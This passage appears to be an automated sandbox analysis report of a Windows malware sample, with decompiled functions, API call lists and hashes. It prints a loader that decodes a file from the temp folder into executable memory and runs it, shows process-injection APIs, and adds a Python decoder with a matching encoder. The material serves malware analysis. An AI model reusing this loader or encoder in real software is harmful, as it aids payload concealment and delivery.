                						if(_t93 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t96;
                							if(_t96 != 0) {
                								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                									L19:
                									 *_t136 = GetLastError();
                								} else {
                									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t104 = 0xd;
                											_v32 = _t104;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				E004018CC();
                				return _t136;
                			}

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _t10;
                				int _t12;
                				int _t18;
                				signed int _t20;
                
                				_t10 =  *0x412014; // 0xf7147b27
                				_v8 = _t10 ^ _t20;
                				_v12 = _v12 & 0x00000000;
                				_t12 =  &_v12;
                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                				if(_t12 != 0) {
                					_t12 = GetProcAddress(_v12, "CorExitProcess");
                					_t18 = _t12;
                					if(_t18 != 0) {
                						E0040C15C();
                						_t12 =  *_t18(_a4);
                					}
                				}
                				if(_v12 != 0) {
                					_t12 = FreeLibrary(_v12);
                				}
                				E004018CC();
                				return _t12;
                			}

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				signed int _t34;
                				signed int _t40;
                				int _t45;
                				int _t52;
                				void* _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t71;
                				signed int _t72;
                				short* _t73;
                
                				_t34 =  *0x412014; // 0xf7147b27
                				_v8 = _t34 ^ _t72;
                				_push(_t53);
                				E00403F2B(_t53,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t52 =  *(_v24 + 8);
                					_t57 = _t52;
                					_a24 = _t52;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					E004018CC();
                					return _t67;
                				}
                				_t55 = _t40 + _t40;
                				_t17 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				if((_t17 & _t40) == 0) {
                					_t71 = 0;
                					L11:
                					if(_t71 != 0) {
                						E00402460(_t67, _t71, _t67, _t55);
                						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                						if(_t45 != 0) {
                							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                						}
                					}
                					L14:
                					E004063D5(_t71);
                					goto L15;
                				}
                				_t20 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				_t47 = _t40 & _t20;
                				_t21 = _t55 + 8; // 0x8
                				_t63 = _t21;
                				if((_t40 & _t20) > 0x400) {
                					asm("sbb eax, eax");
                					_t71 = E00403E3D(_t63, _t47 & _t63);
                					if(_t71 == 0) {
                						goto L14;
                					}
                					 *_t71 = 0xdddd;
                					L9:
                					_t71 =  &(_t71[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E004018E0();
                				_t71 = _t73;
                				if(_t71 == 0) {
                					goto L14;
                				}
                				 *_t71 = 0xcccc;
                				goto L9;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
                				signed int _t9;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x412fc8 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x40cd48 + _t9 * 4);
                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0xf7147b28
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0x412064; // 0xffffffff
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E00403ECE(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00404192(_t25, _t31, 0x4132a4);
                							E00403E03(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00403E03();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E00403E8B(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x412064; // 0xffffffff
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E00403ECE(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00404192(_t27, _t32, 0x4132a4);
                									E00403E03(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00403E03();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E00405878(_t25, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E00405878(_t23, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004025BA() {
                				void* _t4;
                				void* _t8;
                
                				E00402AE5();
                				E00402A79();
                				if(E004027D9() != 0) {
                					_t4 = E0040278B(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00402815();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                C-Code - Quality: 79%
                			E10001140() {
                				signed int _v5;
                				struct _OVERLAPPED* _v12;
                				void* _v16;
                				long _v20;
                				long _v24;
                				void* _v28;
                				short _v548;
                				long _t55;
                				void* _t57;
                				long _t59;
                				void* _t60;
                				int _t62;
                
                				_v12 = 0;
                				_v24 = 0;
                				if(IsDebuggerPresent() != 0) {
                					DebugBreak();
                				}
                				E10001000();
                				_t55 = GetTempPathW(0x103,  &_v548);
                				if(_t55 != 0) {
                					lstrcatW( &_v548, 0x10003000);
                					_t57 = CreateFileW( &_v548, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                					_v16 = _t57;
                					if(_v16 != 0xffffffff) {
                						_t59 = GetFileSize(_v16, 0);
                						_v20 = _t59;
                						if(_v20 != 0xffffffff) {
                							_t60 = VirtualAlloc(0, _v20, 0x3000, 0x40); // executed
                							 *0x1000302c = _t60;
                							if( *0x1000302c != 0) {
                								_t62 = ReadFile(_v16,  *0x1000302c, _v20,  &_v24, 0); // executed
                								if(_t62 != 0) {
                									FindCloseChangeNotification(_v16); // executed
                									_v12 = 0;
                									while(_v12 < _v24) {
                										_v5 =  *((intOrPtr*)( *0x1000302c + _v12));
                										_v5 = (_v5 & 0x000000ff) - 0x3d;
                										_v5 = _v5 & 0x000000ff ^ 0x00000007;
                										_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
                										_v5 = (_v5 & 0x000000ff) - _v12;
                										_v5 =  !(_v5 & 0x000000ff);
                										_v5 = (_v5 & 0x000000ff) - _v12;
                										_v5 = _v5 & 0x000000ff ^ 0x000000d1;
                										_v5 = _v12 + (_v5 & 0x000000ff);
                										_v5 = _v5 & 0x000000ff ^ 0x00000093;
                										_v5 = (_v5 & 0x000000ff) + 0x44;
                										 *((char*)( *0x1000302c + _v12)) = _v5;
                										_v12 =  &(_v12->Internal);
                									}
                									_v28 =  *0x1000302c;
                									 *0x100020a4(); // executed
                									return _v28();
                								}
                								return _t62;
                							}
                							return _t60;
                						}
                						return _t59;
                					}
                					return _t57;
                				} else {
                					return _t55;
                				}
			}

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 10001157
                • DebugBreak.KERNEL32 ref: 10001161
                • GetTempPathW.KERNEL32(00000103,?), ref: 10001178
                • lstrcatW.KERNEL32(?,10003000), ref: 10001193
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011B2
                • GetFileSize.KERNEL32(000000FF,00000000), ref: 100011CC
                Memory Dump Source
                • Source File: 0000000B.00000002.306098906.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                • Associated: 0000000B.00000002.306081682.0000000010000000.00000002.00020000.sdmp
                • Associated: 0000000B.00000002.306112159.0000000010002000.00000002.00020000.sdmp
                • Associated: 0000000B.00000002.306122588.0000000010004000.00000002.00020000.sdmp
                Similarity
                • API ID: File$BreakCreateDebugDebuggerPathPresentSizeTemplstrcat
                • String ID:
                • API String ID: 3387724011-0
                • Opcode ID: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction ID: 1b8f206140e46b40f8892c82d4497af35837fa909e52085900f9582b4d9b2705
                • Opcode Fuzzy Hash: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction Fuzzy Hash: BD517570D08399EFEB05CBF4C898BEDBFB4EF09381F048199E551A6286C6755749CB21
                Uniqueness

                Uniqueness Score: -1.00%
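
E10001140 above, from the DLL mapped at 0x10000000 in process 11, is the stage loader for the next payload: it appends the string at 0x10003000 (not recovered on this page) to %TEMP%, opens that file, reads it into a PAGE_EXECUTE_READWRITE (0x40) allocation, rewrites every byte with the eleven-step arithmetic in the while loop, and finally calls the buffer at offset 0, so the decoded blob begins with executable code rather than a PE header. The odd `_v12 = &(_v12->Internal)` is decompiler noise for `_v12++` (the loop counter was typed as an OVERLAPPED pointer). The Python below is an added re-implementation of that transform, not code from the sample or from the report: the constants are copied from the decompilation, `encode_payload` is the inverse written for testing, and the sample input is constructed. Every intermediate value is masked to 8 bits exactly as the `& 0x000000ff` in the decompilation does, and the index subtraction wraps modulo 256 for offsets above 255.

```python
# Added example: per-byte transform from E10001140 (constants taken from the
# decompilation on this page). Not code from the sample or from the report.
import sys


def decode_payload(data: bytes) -> bytes:
    """Apply the loader's transform to each byte; i is the file offset (_v12)."""
    out = bytearray(len(data))
    for i, b in enumerate(data):
        v = (b - 0x3D) & 0xFF                 # _v5 = (_v5 & 0xff) - 0x3d
        v ^= 0x07                             # _v5 = _v5 ^ 0x07
        v = ((v >> 1) | (v << 7)) & 0xFF      # rotate right by one bit
        v = (v - i) & 0xFF                    # _v5 = _v5 - _v12
        v = (~v) & 0xFF                       # _v5 = !_v5 (bitwise not)
        v = (v - i) & 0xFF                    # _v5 = _v5 - _v12
        v ^= 0xD1                             # _v5 = _v5 ^ 0xd1
        v = (i + v) & 0xFF                    # _v5 = _v12 + _v5
        v ^= 0x93                             # _v5 = _v5 ^ 0x93
        v = (v + 0x44) & 0xFF                 # _v5 = _v5 + 0x44
        out[i] = v
    return bytes(out)


def encode_payload(data: bytes) -> bytes:
    """Exact inverse of decode_payload (each step undone in reverse order).

    Written here only so the transform can be round-trip tested; the sample
    on this page contains no encoder.
    """
    out = bytearray(len(data))
    for i, b in enumerate(data):
        v = (b - 0x44) & 0xFF
        v ^= 0x93
        v = (v - i) & 0xFF
        v ^= 0xD1
        v = (v + i) & 0xFF
        v = (~v) & 0xFF
        v = (v + i) & 0xFF
        v = ((v << 1) | (v >> 7)) & 0xFF      # rotate left by one bit
        v ^= 0x07
        v = (v + 0x3D) & 0xFF
        out[i] = v
    return bytes(out)


if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Decode the file the loader would read from %TEMP% and emit the stage.
        with open(sys.argv[1], "rb") as fh:
            sys.stdout.buffer.write(decode_payload(fh.read()))
    else:
        # Constructed demo input, not data from the sample.
        blob = encode_payload(b"constructed test input")
        print(decode_payload(blob))
```

Run it as `python decode.py <dropped file>` once the file name has been recovered from the DLL's data section; the output is the buffer the loader jumps into. The IsDebuggerPresent/DebugBreak check at the top of the function has no influence on the decoding and can be ignored for static extraction.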

                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02990807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 029909D4
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: f5135b3743cf73905fcd8d4912b67a3c2746c4ff0a4e36f35c53cedd28895566
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: BFA1E130E00209EFEF10DFE8C985BADBBB5BF18325F20445AE565BA2A0D3755A90DF54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0299101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02991044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02992050
                Strings
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: dfeea410093ef84c2f7bf5dba44cd2786ee93b069eae1fdd258caa8219b69b12
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: DBA2A315A94398A8EB70C7A4BC56BFDA3B1AF44B10F1054C7E60CEE1E1D3B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02990373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02990396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 029903BA
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction ID: dc6d9e842ae8ff05e1bd9294b829eee992fa9f82412018ab8ef350759e618606
                • Opcode Fuzzy Hash: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction Fuzzy Hash: D2322631E40218EEEF60CBA8DC45FEDB7B5AF48714F20449AE618FA2A0D7715A80DF15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02991044
                Memory Dump Source
                • Source File: 0000000B.00000002.305995931.0000000002990000.00000040.00000001.sdmp, Offset: 02990000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: b2fdf009934e42c1bc00f65a63b648a4e7dc21a0ad3ecfa7c6baa83f78f63cc5
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 97D05EB1C5030CBFCF00EFA2C946CADBF7DEB50711F1081AAAC0067101EA759B509A50
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Executed Functions

                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02440807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 024409D4
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: 898398fa74016db31510fe332f0a54d794fad8bd646ea7f28fa44a4b19fb1a3e
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: F3A1F230E00209EFEF14DFE4C945BADBBB1BF08316F20545AE610BA2A0DB745A91DF54
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0244101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02441044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02442050
                Strings
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: 5081fc29bf4ab6eb321b0f4001b878fd7775b5d012ff5a99cf44b4338b87957d
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: EDA2B515A94398A8EB70CBA4BC16BFD63B1AF44B10F1054C7E60CEE1E1D7B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02440373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02440396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024403BA
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction ID: d7432da69f710db4c5a6ac12c3b5ddaf1ab6292060abe4ce56e8a0fe3048898c
                • Opcode Fuzzy Hash: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction Fuzzy Hash: 6A323731E40218EEEB24CBA4DC45FEDB7B5EF08705F10549AE609FA2A0DBB05A90CF15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02441044
                Memory Dump Source
                • Source File: 0000000C.00000002.310283075.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                Similarity
